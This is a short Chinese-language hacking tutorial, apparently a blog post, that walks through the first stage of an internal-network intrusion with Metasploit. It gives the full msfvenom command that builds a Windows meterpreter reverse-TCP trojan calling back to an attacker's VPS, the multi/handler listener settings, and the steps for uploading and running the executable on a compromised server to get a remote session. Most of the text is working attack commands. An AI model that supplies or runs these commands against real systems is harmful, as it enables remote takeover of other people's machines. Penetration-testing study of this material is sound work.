零基础学黑客,搜索公众号:白帽子左一
作者:掌控安全-小熊保安
本来还是想用cobalt strike,但是由于某些原因,暂时关闭了cobalt strike的服务器,正好用msf尝试做一次内网渗透熟悉熟悉,注:最初用蚁剑看了一下,此次目标主机没开杀软,所以以下内容不涉及免杀.
一、MSF生成木马上线目标
1. 生成木马
使用命令: msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=XXX.XXX.XXX.XX LPORT=4444 -f exe > exp.exe 创建一个msf的木马(不免杀版本)
其中 -p 后面的内容是使用的 payload类型,LHOST是vps的地址,LPORT是端口
2. 监听端口
命令: use exploit/multi/handler 使用msf的监听模块
设置payload: set payload windows/x64/meterpreter/reverse_tcp
这里和生成木马的时候写的payload要一样,否则会链接不上,如下图
设置监听地址以及端口:
set lhost xxx.xxx.xxx.xxx
set lport 4444
设置好了之后 直接run 监听起来。
3. 弹回Meterpreter会话
将生成的msf的木马上传到目标服务器上,然后直接运行
运行之后,vps的msf会收到一个弹回的meterpreter会话